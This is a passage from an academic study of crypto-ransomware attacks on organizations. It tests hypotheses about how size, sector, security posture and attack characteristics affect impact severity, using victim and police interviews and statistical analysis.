As with so much of the reported facts and figures pertaining to ransomware, there is disagreement as to whether an organization’s size makes it more or less susceptible to attack. An international survey conducted by BCI [ 26 ] found that ransomware attacks are a substantially more common problem for large enterprises than they are for SMEs. However, contradictory findings are reported by Beazley [ 27 ] who state that SMEs were disproportionately hit by ransomware attacks in 2018, with 71% of all infections occurring within such organizations.

Many SMEs based in the UK believe that they are not likely to be targeted by ransomware attacks; while they place high value on the importance of IT to their business, they are generally not worried about the threat of data loss [ 29 , 30 ]. SMEs, by their entrepreneurial nature, are more likely to engage in risk-taking behaviour [ 31 ]. However, SMEs may underestimate the value to hackers of their information systems and may not realize that they could be targeted as a hop to gain entry into their partners’ networks. As Smith [ 32 ] puts it, ‘even if you think your company has nothing worth stealing, losing access to all your data is no longer an unlikely event.’ Kurpjuhn [ 33 ] makes the point that SMEs must accept that they are exposed to similar levels of risk as large enterprises but have lower budgets and lesser resources to address those risks.

An argument could be made that larger organizations, simply because they employ more people, are at greater risk of infection due to human error; it only takes one reckless act by a single individual to compromise an entire network. Although not quite the same thing, Bergmann et al . [ 34 ] found no correlation between the size of a household and the rate of cybercrime victimization experienced by members of that household. How that finding would scale up to larger units in a non-domestic setting is a matter of conjecture, but it seems reasonable to assume that the potential for human error increases relative to the size of the unit.

Hypothesis 1a: An organization’s size influences the impact severity of a ransomware attack.

Hypothesis 1b : An organization’s sector influences the impact severity of a ransomware attack.

Security posture

Because ransomware combines technical and social characteristics to create its impact, we explore the organizational victim responses to attacks through the lens of ‘security posture’. Security posture is defined as ‘the security status of an enterprise’s networks, information, and systems based on information assurance resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes’ [ 36 ]. Prior research into ransomware attacks on organizations shows that a lack of basic security practices, or failure to comply with them, was a common failing [ 15 , 18 ]. Organizations that do not have adequate and effective backup strategies are much more likely to end up having to pay the ransom to retrieve their data [ 15 , 28 ]. Connolly and Wall [ 8 ] developed a taxonomy of ransomware countermeasures, emphasizing a multi-layered approach in protecting organizations against ransomware.

While technical defence mechanisms are very important, so too is individual behaviour and good ‘online lifestyle’. Inadequate care by employees when choosing to open e-mail attachments or hyperlinks, downloading ‘free’ versions of software or cracked games, browsing adult content or illegal sports live streams, and installing apps from untrusted sources are all examples of poor online hygiene that can increase the risk of a ransomware infection. Riglietti [ 28 ] observed that ‘looking at what users say, avoiding infection appears to be a matter of spreading the right security culture within an organisation rather than a technical issue.’ A key part of this is education and awareness [ 37 , 38 ]. In their studies of ransomware victims, Shinde et al . [ 19 ] and Zhang-Kennedy et al . [ 27 ] both observed a tendency by employees to assume that cybersecurity was essentially the responsibility of the IT Department. While it is to be expected that the IT Department should take the lead on security and actively promote a strong posture, there is an onus on individuals to utilize good personal security practices and not engage in irresponsible behaviour.

Hypothesis 1c: An organization’s security posture influences the impact severity of a ransomware attack.

Crypto-ransomware propagation class

Since crypto-ransomware was incapable of propagating on networks prior to 2013, we decided to create a simple taxonomy according to the degree of infectiousness (see Table 2 ). Different propagation classes of crypto-ransomware may have a lesser or greater effect on the outcome of a crypto-ransomware attack as a result of the volume of infection spread.

Classification by crypto-ransomware propagation

What we term ‘Generation I’ crypto-ransomware was not particularly effective in extorting money due to several technological shortcomings, such as the use of easy-to-break encryption, inefficient management of decryption keys and limited propagation capabilities. It is highly likely that Generation I variants are obsolete.

We refer to variants such as CryptoWall, CryptoLocker and CryptoDefence as ‘Generation II’. These forms of ransomware initially penetrate networks via desktops or laptops and subsequently take advantage of the local user security context to spread via network paths, encrypting network shares that the user has ‘write’ access to. They can also encrypt devices physically connected to the infected machine.

What we refer to as ‘Generation III.a’ malware are those such as Samas and BitPaymer that tend to breach networks via vulnerabilities found in servers [e.g. a weak password in Remote Desktop Protocol (RDP)]. Once inside the server, attackers manually and/or automatically search for various weaknesses within the network (e.g. poor authentication controls, a flat network structure, the lack of network visibility and detection mechanisms). Such vulnerabilities permit attackers to stay undetected and hijack multiple devices and the entire network in some cases. Crypto-worms like WannaCry (‘Generation III.b’ in our classification) have a similar devastating effect, the chief difference being that they take advantage exclusively of software vulnerabilities in order to propagate.

Hypothesis 2a: The crypto-ransomware propagation class influences the impact severity of a ransomware attack.

Attack type and target

Hypothesis 2b : The attack type, i.e. opportunistic or targeted, influences the impact severity of a ransomware attack.

Hypothesis 2c : The attack target, i.e. human or machine, influences the impact severity of a ransomware attack

This study used a mixed methods approach following an exploratory sequential design [ 43 ]. Phase 1 was qualitative. In order to assess the degree of severity of ransomware attacks (our first objective), we required a measurement instrument. A literature search revealed that there are no readily available tools for this particular purpose. Since crypto-ransomware incidents entail some unique consequences (e.g. encrypted data, disabled systems), we could not use substitutes from other cybercrime studies; the assessment instrument had to be specific to crypto-ransomware attacks. Hence, the aim of Phase 1 was to inductively develop an Impact Assessment Instrument (grounded in empirical data) that can be used to effectively evaluate the severity of crypto-ransomware attacks on organizations in our sample. In Phase 2, we gathered additional quantitative data so as to be able to statistically test our hypotheses.

The Ethics Committee at the University of Leeds approved this research. Consent forms were signed by all study participants. All necessary precautions were followed to ensure the anonymity of study participants and the confidentiality of collected data. The majority of participants were from the UK but there were also a few from North America. Where the names of organizations are subsequently referred to in this article, aliases are used to protect the anonymity of respondents (see   Appendix 1 ). Additionally, interviewees from UK Police Cybercrime Units are given the aliases of CyberRM, CyberLM, CyberTL, CyberBR, CyberBL, CyberTR and CyberCU. Incidents took place between 2014 and 2018.

Sampling strategy and data collection

A purposeful sampling approach was employed to collect data in Phase 1. We conducted 10 semi-structured interviews with professionals from organizations that became victims of ransomware attacks. Interviewees were IT/Security Managers and Executive Managers with an average of 17 years of professional experience. There was one respondent per organization. Since some organizations were attacked more than once, accounts of 15 ransomware incidents were elicited from 10 organizations.   Appendix 1 (please refer to first 15 incidents) contains information about the characteristics of attacks and organizations that were interviewed in Phase 1.

In order to enhance the reliability and richness of data, we sought access to individuals who had direct experience of responding to crypto-ransomware incidents. As for crypto-ransomware attacks, the key selection criteria was to include a range of consequences for the victims, varying from low severity (e.g. minimum disruption to business, minimum loss of information, swift recovery) to high impact (e.g. business disruption that lasted for several months, significant loss of critical information, slow recovery).

An interview guide was designed with the aim to learn about participants’ perceptions of the attacks’ impact and the factors that aggravated or moderated the consequences of these incidents. This exercise guided the development of the Impact Assessment Instrument. Since we planned to use these initial 15 cases in Phase 2 of data analyses, we also ensured to collect profile information about organizations (e.g. size, sector and industry), causes of crypto-ransomware attacks, information about security postures and characteristics of attacks (e.g. attack type, crypto-ransomware propagation class and attack vector). Sample interview questions are provided in   Appendix 2 . Six interviews were conducted face-to-face, three via Skype with overseas respondents and one via e-mail correspondence.

The decision to stop data collection in qualitative research is made when additional insights are not emerging with new observations. This point is typically achieved after a dozen or so observations [ 44 ]. We felt that after examining about 10 ransomware incidents, the incremental learning stopped. But to ensure that the point of ‘theoretical saturation’ is sufficiently reached, we collected data on 15 cases in total.

Impact Assessment Instrument development (qualitative data analysis)

An inductive content analysis method was used to analyse data and develop the Impact Assessment Instrument. Within the interview transcripts, the impact of crypto-ransomware incidents emerged as a major topic. Interviewees eagerly described their experiences of being attacked, particularly focusing on the consequences of crypto-ransomware attacks. For example, respondents from GovSecJN, EducInstFB, LawEnfM, GovSecA and HealthSerJU spoke in great detail about the despair and distress they experienced. An IT/Security Manager from GovSecJN, a large public sector organization, explained how business continuity disruption affected them:

There was an impact on service delivery – we could not do what we were supposed to do. It was significant for us. Besides, all our resources were directed towards the incident instead of doing our job.

An IT/Security Manager from LawEnfJU reported a similar experience:

Ransomware encrypted all of our data files, which, in effect, took the agency offline for about 10 days. This was extremely critical as we could not do our job. We had the server up-and-running in 10 days and then it took another 10 days to manually re-enter all data. So, the attack critically affected the operations of the department for about 20 days … . The overall impact of this attack was severe, definitely.

An Executive Manager from EducInstFB, a large public organization, shared with us that a Generation III.a crypto-ransomware encrypted hundreds of machines (desktops, laptops and servers). As a result, several critical business functions were disabled and important data were inaccessible. The victim disclosed that various security holes – including ineffective backups, poor patching regimes, the lack of network visibility and feeble access control management practices – led to infection and subsequent dramatic consequences.

GovSecA, a large public organization, suffered an unprecedented attack by Generation III.a crypto-ransomware, where close on 100 servers got encrypted, affecting the operations of the organization for months. Most importantly, the victim lost a lot of critical data because they only had partial backups. At the time of the interview, GovSecA was already in post-attack recovery for 8 months. The interviewee shared that the recovery was still not completed at this point. An IT/Security Manager from GovSecA described their experience as follows:

We all came back to work on Tuesday morning after a bank holiday weekend and the sun was streaming in through the windows. The cleaners have been in, the office looked great. Everyone felt refreshed after the long weekend. And it took a while for us to realise what happened; that all computing had been turned to stone [encrypted]. Virtually nothing was left untouched. If half of the building had fallen off, you would understand that something has happened. But everything looked great. But it was not – the organisation could not operate.

An Executive Police Officer from LawEnfM, a public SME, described how the organization suffered two ransomware attacks within 2 weeks, affecting critical data:

We are a full-service law enforcement agency and we have a wide variety of data, some of which is very sensitive. For example, data relevant to criminal incidents like manslaughter cases, child pornography, child sex cases. Several months worth of this data was encrypted, which was pretty significant to us … . While we were recovering after the first attack, we were very unfortunate to get infected by ransomware again.

Comments such as in these few selected excerpts featured regularly in the interviews. We observed that when victims described the impact of ransomware attacks, they focused on factors such as business continuity disruption, recovery time, the number of devices affected, how critical encrypted information was to business and information loss.

On the contrary, interviewees from LawEnfJ and GovSecJ talked about factors that effectively saved the organization from far worse outcomes and emphasized that organizations must be prepared for these attacks or suffer severe consequences. For example, an IT/Security Manager from LawEnfJ, a public SME, shared the following:

We practice good basic security principles. We have backups in multiple locations … . It comes down to basics like staying up to date with industry. Just recently we went through this massive patching for Intel processors and other processes that could be leveraged into a whole host of attacks … . We were well-prepared for the attack … . We restored everything over a weekend. We were infected on Friday and back up-and-running on Monday.

Similarly, an IT/Security Manager from GovSecJ, a large public organization, explained how they were able to recover with little inconvenience:

An Incident Management Plan is crucial during cyber-attacks. Instead of running around with our hands up in the area, screaming for help, our response was logical and structured … . We lost some data due to incremental backups but nothing significant that would have stopped an organisation from functioning … . The infection took place at approximately 9 in the morning. By the end of the day, data was restored, and everything was back to normal.

As a result of our data analysis in Phase 1, five categories of negative outcomes emerged from the data, namely ‘business continuity disruption timeline’, ‘recovery time’, ‘affected devices’, ‘encrypted information critical to business’ and ‘information loss’. Under each of these categories, the data enabled us to build impact descriptors ranging across three degrees of severity (low, medium and high). In Table 3 , we present the severity descriptors for the five impact categories and corresponding attacks.

Impact Assessment Instrument and corresponding victims

Given the broad range of organization types and sectors in our sample, we anticipated that it would be difficult to arrive at a consensus on what constitutes ‘Low’, ‘Medium’ and ‘High’ levels of severity. For example, an outcome that might be regarded as being of ‘Low’ severity by one respondent could possibly be regarded as ‘High’ by another, depending on the nature of their business and level of dependency on critical IT systems. However, there was a remarkable degree of consistency among the respondents. There is a general acceptance that any ransomware attack, however minor, is likely to result in an interruption of at least a few days rather than hours. Thus, recovery times and business continuity disruption of a number of days (up to a week) were rated as being on the ‘Low’ end of the spectrum because, although any disruption is traumatic, in relative terms that is the least amount of time that is expected to be lost. As one interviewee put it,

Considering the impact and seriousness of the ransomware, it is going to sound strange, but I think that to only lose twelve hours worth of data is an acceptable outcome. If we had not backed up, we would have lost 47,000 files, clearly that would have been a far more significant issue. (IT/Security Manager, GovSecJN)

The Impact Assessment Instrument presented in Table 3 is derived from empirical data and reflects the actual consequences of crypto-ransomware attacks as described by the victims. All five of the items shown in the table are components of the overall severity of a ransomware attack. Because the five items are measured on a three-point ordinal scale, as opposed to a multiple-point continuous scale, we used the ordinal alpha coefficient [ 45 ] to test for internal reliability. The value for ordinal α = 0.96 which indicates a high degree of agreement between the five items.

To compute a composite score for overall severity, we considered using the average or median of the five items but decided to use the maximum. The logic behind this reasoning is that if any of the items is evaluated as ‘High’, it means that the attack represented a serious shock to the organization with major consequences. Therefore, a ‘High’ severity value for any single item trumps all the others, even if they all have lesser values. This also gets around the aforementioned problem whereby the assessment instrument might misevaluate a particular item as ‘Low’ when in fact, because of the organization’s circumstances, it should be ‘High’; in such cases, the likelihood is that at least one other item would have a ‘High’ rating and hence the overall severity would correctly be evaluated as ‘High’.

Next, using the Impact Assessment Instrument shown in Table 3 , we analysed all of the initial 15 cases (interview transcripts) to determine the extent of the attack impact. We assigned the degree of severity for all five categories for each impact item. An exemplar of this assessment exercise is provided in   Appendix 3 .

We were conscious of the limitation that the initial version of the Impact Assessment Instrument was based on data collected from 10 public organizations, with no private businesses. To remedy this, as we collected data on a further 45 cases, including both public and private organizations, we asked interviewees to assess the severity of ransomware attacks using our scale (i.e. low, medium, high) and comment on the reasons for their answer. The purpose of this exercise was to validate our instrument and confirm that the categories that emerged initially were relevant across the whole sample. We also validated the instrument by consulting with experienced police officers. We found that the instrument gave a reliable measure of the severity of an incident as perceived by the victim.

In order to test our hypotheses, we required to collect more data on crypto-ransomware incidents. It has been widely acknowledged that collecting data on cyberattacks is extremely difficult. In Phase 1, it took us over 6 months to find organizations that were willing to share sensitive matters relevant to the attacks. Therefore, we made a decision to approach the data collection matter differently in Phase 2. Instead, we sought out police officers from UK Cybercrime Units who had extensive experience in dealing with crypto-ransomware attacks. Mainly, such experience included helping organizations to effectively respond to the attacks, understanding what caused them, providing emotional support to victims if necessary and offering post-attack advice. Our expectation was that each police officer would be able to provide relevant information on several ransomware incidents at the time, which would make the process of data collection more manageable.

We succeeded to connect with 10 police officers (four Detective Sergeants and six Detective Constables) and 1 Civilian Cybercrime Investigator, who provided information on 22 usable ransomware incidents via semi-structured interviews and one focus group. Two police officers were interviewed twice as they were able to add new information. The average professional experience of the study respondents was 19 years. We also managed to collect data on 22 more cases with a Detective Inspector, who, unfortunately, was not able to meet with us face-to-face but agreed to provide data via a structured questionnaire (sent over e-mail). Additionally, we interviewed an IT/Security Manager with over 20 years of professional experience, which added one final case to our database of ransomware incidents. Relevant information is available in   Appendix 1 (Cases 16–60). Due to the aforementioned access constraints, a snowballing technique was used to collect data for Phase 2.

The questionnaire and second phase interview guide (see   Appendix 4 ) were based on the Impact Assessment Instrument and hypotheses. We asked questions that would help us to assess the impact of an attack. We also collected profile information on organizations (e.g. size, sector and industry) and characteristics of attacks (e.g. attack type, crypto-ransomware propagation class and attack target). Additionally, we included questions that would help us classify the security posture of each organization. For this purpose, we used the taxonomy of crypto-ransomware countermeasures developed in our previous work [ 8 ]. The headings from this taxonomy served as a guide for questions. Therefore, in order to assess a security posture of organization victims, we asked interviewees about security education, policies and practices, technical measures and network security, the incident response strategy and the attitudes of management towards cybersecurity (see   Appendix 5 ).

Overall, 45 additional cases of ransomware attacks were examined in Phase 2, bringing the total to 60 cases. For five of the 60 cases, there was insufficient data to be able to determine the overall impact severity, so those cases were discarded as being unusable, leaving us with 55 usable cases. Although a snowballing technique was used to collect data in Phase 2, our overall sample included organizations of different sizes and from different sectors. Attacks were recorded against both humans and machines by different crypto-ransomware propagation classes. Different levels of security posture were noted among participants, ranging from weak to strong. Finally, the sample contained opportunistic attacks as well as targeted ones.

For a few of the cases, we did not have values for all of the five items in the Impact Assessment; in those cases, we evaluated the overall impact based on the maximum of the items for which we had values, supported by an inspection of qualitative data from those cases. We found that this method of computing the composite score for overall severity gave the most accurate results, as validated using participants’ personal assessment of the attack impact and our own judgement based on what we gleaned from interviews. Results of the assessment exercise are available in Table 4 .

Impact Assessment Instrument and observed frequencies among respondents ( n  = 55)

Note: Overall n  = 55 but item response rates ranged from 85% (47) to 96% (53).

Quantitative data analysis

Overall, our sample included 50 organizations of different sizes, sectors (i.e. public or private) and industries (55 usable cases of crypto-ransomware attacks). Totally, 35 (70%) of the organizations were SMEs, while 15 (30%) were large organizations. We used the European Commission guidance to define the organization’s size [ 46 ]. The industries were broad and varied, including IT, government, law enforcement, education, healthcare, financial services, construction, retail, logistics, utility providers and several other categories. Of the 50 organizations, 19 (38%) were in the public sector and 31 (62%) were in the private sector. Five (10%) were located in the North America and 45 (90%) in the UK (see   Appendix 7 ). Security postures were determined for 34 of the 50 organizations (see Table 5 ). Twenty organizations (59%) had a weak security posture, 13 (38%) had a medium-security posture and only one had a strong posture. We used the criteria outlined in Appendices 5 and 6 to assess the security postures of organizations.

Cross-tabulations for Hypotheses 1a, 1 b and 1c

P < 0.05; *** P < 0.001.

Except where otherwise stated, the hypotheses were assessed using two-sided Fisher’s Exact tests. The size of our sample provides acceptable power to detect moderate-to-large relationships between categorical variables using this technique. Where data was missing, cases were excluded; the number of relevant cases ( n ) is stated in the results of each test.

We found that the degree of severity of a ransomware attack did not vary by organizational size, P = 0.542. Indeed, the majority of attacks in both SMEs and large organizations were of high severity (57% and 53%, respectively).

The severity did, however, vary according to organizational sector. Private organizations were considerably more likely than public organizations to experience serious negative consequences as a result of ransomware attacks, P = 0.044. Of the private organizations, 68% were hit by attacks of the highest severity, whereas a much lower percentage (37%) of public organizations were as badly affected. This finding supports Hypothesis 1b.

Most tellingly, impacts also varied with organizational security posture, such that those organizations with weak security postures were far more likely to experience a severe impact than were those with medium or strong postures, n  = 34, P < 0.001. Of the organizations that had a weak posture, 80% had been hit by ransomware attacks of high severity. Thus, Hypothesis 1c is also supported.

Post hoc, we found that security posture did not differ according to organization size, with the majority of organizations – 57% of SMEs and 64% of large organizations – having a weak security posture. However, when looking at the relationship between organization sector and security posture, a significant difference ( P = 0.035) was observed. Public organizations had considerably stronger security postures than those in the private sector. This may partly explain why the impact of attacks on public sector organizations was not as severe.

As can be seen in   Appendix 1 , the 50 organizations spanned 23 different industries (i.e. financial services, healthcare, retail, etc.) so it was not meaningful to conduct correlation analysis on this variable as the numbers were spread too thin. However, one observation that stands out is that of the seven respondents from the IT industry, six of them (86%) experienced attacks of high severity. This is above average and somewhat surprising, although with such a small sub-sample it is not possible to draw reliable inferences.

Looking then at the crypto-ransomware propagation classes, 32 (58%) were of type Generation II, while 23 (42%) were of type Generation III (Generation III.a and Generation III.b classes were merged in data analysis due to similar propagation characteristics). Totally, 38 attacks (72%) were opportunistic and 15 (28%) were targeted. Twenty-five attacks (47%) were targeted at humans and 28 (53%) aimed at machines (see Table 6 ).

Cross-tabulations for Hypotheses 2a, 2 b and 2c

P < 0.1.

The degree of severity did not vary with the crypto-ransomware propagation class (i.e. Generation II vs. Generation III) n  = 55, P = 0.334, nor with the attack target (i.e. human vs. machine), n  = 53, P = 0.813.

The type of the attack (opportunistic vs. targeted) was also considered. Targeted attacks were more likely than opportunistic ones to lead to severe consequences, n  = 53, P = 0.063. 80% of targeted attacks gave rise to impacts of high severity, whereas a considerably lower proportion of opportunistic attacks (45%) had high negative consequences. This difference is statistically significant (Mann–Whitney U = 177, P = 0.02) so we are inclined to accept Hypothesis 2b.

Post hoc, companies with a weak posture were much more likely to be targeted via machine vulnerabilities as a point of entry, whereas companies with medium or strong security postures were more likely to be attacked via social engineering tricks ( n  = 34, P = 0.019). We also observed that 91% of targeted attacks were against organizations that had weak security posture. Table 7 demonstrates results of hypotheses tests.

Results of hypothesis tests

Organization size does not matter, ransomware is indiscriminate

Within the observed sample, organization size, by itself, did not affect the severity of attacks. As outlined in ‘Organisation characteristics: size and sector’ section, prior findings and opinions on the relationship between organization size and the incidence of ransomware attacks are rather inconsistent, with some saying that ransomware is mainly a problem for large enterprises and others saying that SMEs make up the bulk of the victims. Of the organizations that we observed, SMEs and large organizations were similarly impacted by ransomware attacks and in most cases the impact felt was of high severity. This result is consistent with interpretations expressed by police officers from UK Cybercrime Units:

Ransomware is indiscriminate. It does not choose its victims. It chooses computers and those computers can be owned by anybody. (Detective Sergeant, CyberBL)

Ransomware does not target organisations of a particular size. All organisations, small, medium and large, are equally affected. (Detective Sergeant, CyberRM)

We observed several large organizations that experienced severe consequences of crypto-ransomware attacks (e.g. EducInstFB, GovSecA, HealthSerJU, SportClubJ, etc.) as well as SMEs (e.g. LawEnfJU, LawEnfF, ITOrgA, ConstrSupA, etc.). Therefore, regardless of how large or small an organization is, there is no room for complacency. SMEs often baulk at spending their limited funds on IT security measures, weighing things up on the basis of the financial cost of countermeasures vs. the expected probability and expected impact of an attack [ 30 ]. While we cannot offer any insights into the probability of an attack, we can speak about impact. Our findings show that if an organization has weak defence mechanisms, then regardless of whether it is an indigenous start-up or a large multi-national corporation, it is likely to experience very severe consequences in the event of a ransomware attack, such as having critical systems knocked out, heavy data losses and major disruptions of several weeks or more.

Private sector organizations are more likely to experience severe effects

Private sector organizations were more likely to report severe impacts than were those in the public sector in the sample observed in this study. This finding can be explained by the very nature of public organizations as compared to private businesses. Public sector organizations are generally state-owned with an obligation to provide some universal service such as healthcare, education, policing, or civic administration. The private sector, on the contrary, is mainly composed of organizations whose ultimate purpose is not to serve the public but to generate profit. Cyberattacks on profit-driven organizations normally lead to substantial financial losses, reputational damage and loss of customers; the series of security breaches on TalkTalk is one such example [ 47 ]. If public organizations such as councils, state agencies and police departments experience a cyberattack, they may lose public confidence, but as sole suppliers they are not going to lose customers or revenue as they are publicly funded. As an IT/Security Manager from GovSecJN (a public organization fully funded by the UK government) explained:

Yes, there was a financial impact because resources were directed towards dealing with the cyber-attack. But it is difficult for us to quantify the financial impact … . The impact is different for us. It is the impact on service delivery to public. How we care for children. How we care for adults. Even road potholes – people could not report potholes because our systems were down.

Information from interviews with police officers working in the UK Cybercrime Units confirmed our impression that private sector organizations suffer more severe consequences; e.g. a specialist detective within the CyberTL unit told us based on his extensive experience that:

Cybercriminals know that the private sector depends on customer service. They know that these organisations will pay. Especially, we find that a lot of IT companies have been hit. I do not think this is because IT companies are more prone to targeting. It is just because when they are hit by ransomware, it is so much more devastating for them due to their dependency on customers.

This observation is in line with our finding that 86% of respondents from the IT industry experienced attacks of high severity. However, it should be noted that our sample is based on attack victims only and is not representative of the number of potential organizations in each industry. Additionally, public or semi-public institutions may experience an equivalent attack as being less critical simply because they are not in competition with other providers.

Against the threat of ransomware, a vigilant security posture is vital

Our hypothesis that there is a relationship between organizational security posture and attack severity was supported. Most specifically, a weak security posture leads to a preponderance of very severe attacks. This suggests that the attacks were detected late, handled badly, or inadequately isolated. Although this observation is relevant to any type of cybercrime, successful ransomware attacks entail unique and rather devastating consequences such as disabled systems, encrypted data and, subsequently, halted business operations. A security weakness that could be easily fixed might cause substantial damage to the victim and even bankruptcy. For example, LogOrgD was infected via a server vulnerability that was widely documented by academics, security vendors and government bodies. Subsequently, the organization lost access to all critical data, including backups. The victim was rapidly losing its customer base and the business was close to bankruptcy. The business owner was particularly distressed and at some point, even had suicidal thoughts – a lifetime of hard work was about to turn into ashes. Ultimately, the company managed to survive but the recovery was timely, costly and extremely challenging. Therefore, IT/Security professionals must be extremely vigilant when it comes to protecting their organizations against ransomware. There is no simple technological ‘silver bullet’ that will wipe out the crypto-ransomware threat. Rather, a multi-layered approach is needed which consists of socio-technical measures, zealous front-line managers and active support from senior management [ 8 ]. As an IT/Security Manager from LawEnfJ puts it:

You have to have the fundamentals in place. If you are talking about backups after the event, you are dead in the water. You must have your system set up in a way that actively thwarts these attacks. If you are playing catch-up, then I am sorry, but the game is over at that point. You must stay up-to-date. If you are not staying current in the industry, you are going to get in trouble really quick.

Several respondents commented that if vulnerabilities are not closed down following ransomware attacks, organizations will get attacked again. For example, GovSecJ was attacked 4 times within 6 months. Although the IT/Security Manager wrote a report recommending organizational changes, senior management did not act upon it. Subsequently, three more attacks followed.

Though LawEnfM made a decision to implement all appropriate changes following the first ransomware attack, ransomware struck second time during the recovery process, taking advantage of the same vulnerabilities. Since the organization suffered considerably as a result of two consequent attacks, the external IT provider made a decision to pay the ransom as they felt responsible. Following this devastating experience (two attacks within 2 weeks), LawEnfM made several important changes in its approach to cybersecurity. HealthSerJU had to experience two very severe attacks before senior management realized the importance of security controls and measures:

I think both attacks fundamentally came down to the fact that there was an under-appreciation of the importance of IT and, therefore, the focus on ensuring that those systems were properly protected was not there … . If we wanted to take a positive from the attacks, it would be that finally executive management gave IT a profile that it has never had before. (IT/Security Manager, HealthSerJU)

Within our sample, public organizations had considerably stronger security postures than those in the private sector. Totally, 78% of the private organizations that we looked at had weak security postures, as opposed to 38% in the public sector. This may be because public institutions have a stronger regulatory mandate to have IT security policies in place. In the UK, the Cyber Essentials scheme was introduced in 2014 and is required for all central government contracts [ 48 ]. In contrast, in the private sector, the majority of organizations do not mandate their suppliers to have cybersecurity standards in operation [ 4 ].

Of course, the promotion of security standards is one matter, adoption is another and actual compliance yet another again. In the past 12 months, 17 452 Cyber Essentials certificates were issued by the UK government [ 49 ] which, going by the estimated 2.6 million businesses in the country [ 50 ] represents just 0.7% of the population. Within higher education institutions – from which division 29% of our public sector sample was drawn – there has been considerable resistance to the uptake of the Cyber Essentials standard [ 51 ]. The ISO27001 standard has been more widely adopted in the UK, but less so in public administration and educational organizations than elsewhere [ 52 ]. The annual UK Cyber Breaches Surveys of recent years reveal that a growing number of businesses are adopting Cyber Essentials, ISO27001, or other similar policies, but it still remains at about half who have no such measures in place [ 4 ].

Ransomware attacks, even of the less sophisticated type, can wreak havoc

There was no pronounced effect of the crypto-ransomware propagation class upon attack impact in the sample examined in this study. This is an interesting finding because Generation III crypto-ransomware has the ability to propagate across large networks and completely paralyse organizational operations. As a Detective Sergeant from CyberTR pointed out:

When I first started, the virus was very specific to the machine. The machine that clicked on the email was the machine that got the virus and the ransomware and that was it. More recent variants of ransomware have the ability to spread. There is definitely a distinction between ransomware that will hit a computer and encrypt any physically connected devices such as USBs, storage devices, and it is a lot more simple, and the likes of WannaCry that will travel across networks and spread to all computers. We have seen this evolution, where suspects are using vulnerabilities to spread across networks. This type of ransomware is more prevalent than it ever was because it gives hackers an advantage.

Rationally, Generation III should bring more devastation. However, our data show otherwise. For example, SecOrgM was infected with the less sophisticated Generation II crypto-ransomware. The victim declared bankruptcy shortly after the attack because the organization did not have backups, could not operate without hijacked data and at the same time was not able to meet ransom demands. Similarly, GovSecJN was hit with the Generation II ransomware class but it had a detrimental effect on the victim. Although GovSecJN recovered relatively quickly, data critical to high priority functions was encrypted, affecting essential functions of the organization. Such organizations provide vital services to the local community and many people depend on these services.

On the contrary, EducInstFB was attacked with Generation III crypto-ransomware that infected hundreds of devices. EducInstFB and its staff lost access to an enormous volume of data, which had scientific value. Several critical systems were disabled that stopped the victim from performing their normal daily tasks. The management made a decision to pay the ransom. Although the recovery was lengthy and challenging, EducInstFB eventually repaired its systems and recovered the majority of data. Another victim of Generation III crypto-ransomware – HealthSerJU – was attacked twice and on both occasions over a thousand devices were infected. Although these attacks had a significant negative effect on the delivery of services, HealthSerJU had effective backups and, therefore, promptly restored its systems. EducOrgA was also infected with Generation III crypto-ransomware, affecting the whole network. However, due to the nature of its business, EducOrgA continued its work as a primary school and teaching activities were not interrupted (while administrative data were gradually restored).

Following these observations, we concluded that the crypto-ransomware propagation class alone may not have a direct impact on the consequences of these attacks. Rather, a combination of factors (e.g. the nature of business, availability of resources to recover data or pay the ransom, the type of systems affected, level of preparedness, etc.) are at play.

Beware the ‘weakest link’

Although Hypothesis 2c was rejected, indicating that the severity of a ransomware attack is not influenced by the attack target (i.e. human or machine), we observed that organizations with a weak posture were much more likely to be targeted via machine vulnerabilities as a point of entry, whereas those with medium or strong security postures were more likely to be attacked via social engineering tricks. This finding could be explained by the fact that many of our study participants trust that technical controls provide an adequate defence against cyberthreats, which is also a commonly accepted belief among industry professionals. Consequently, IT/Security professionals focus on implementing measures like e-mail hygiene, vulnerability and upgrade management and sophisticated monitoring and detection systems, but seemed to neglect the ‘human factor’ problem and do not have strong security education and training, the importance of which as a security countermeasure is well established [ 6 , 37 , 38 ]. Therefore, these organizations are attacked via ‘the weakest link’ – they may have an adequate defence from a technical perspective, but weak employee security practices. As the IT/Security Manager from GovSecJ put it:

Effective defence always starts with a user. You need to make sure that along with teaching people how to use your applications, IT systems, you incorporate in there a good amount of cyber security.

In our sample, 27 attacks were successful due to humans opening malicious attachments or clicking on links. Several respondents alluded to shortcomings regarding human error and made appropriate changes. For example, LawEnfM replaced online security training with face-to-face tuition after an employee failed to notice rather obvious signs of a malicious e-mail. A staff member from LawEnfJU shut down their own machine after receiving a ransom note and booted several other machines using their credentials. Although the employee hoped to solve the problem, they instead infected more machines and lost precious time to contain infection. Since then, LawEnfJU implemented a new policy that obliges employees to report any out-of-ordinary activity, no matter how insignificant it seems. The organization regularly sends its employees ‘call and verify’ warnings to remind them of this new rule. However, even with effective security education in place, humans are continually prone to make mistakes and do things they know they probably shouldn’t. For example, an employee from GovSecJN who had recently completed security training still proceeded to open an e-mail attachment, even though he felt it was quite suspicious and potentially risky.

Don’t become an easy target, be careful what you reveal about your organization

Targeted attacks were more likely than opportunistic ones to lead to severe consequences in the observed sample. This result is expected as targeted attacks require a lot of preparation, but the ‘prize’ is much higher:

There is a recent trend of a particular variant of ransomware called BitPaymer, which is seen as a big problem. It seems to me to be very targeted because cybercriminals are making extremely large demands on the businesses, which I have never seen before – £30,000 –so they are clearly very targeted. Cybercriminals know the targets they are going after. (Detective Sergeant, CyberTL)

Such attacks suggest that there is some kind of network reconnaissance behind, so cybercriminals know what company they are targeting and how much to ask for. Cybercriminals will say, ‘Wait there, your turnover is £400m so you can pay maybe £2m’. There are victims out there that have paid up to £1,000,000 or even more to get the decryption key. (Detective Constable, CyberBR)

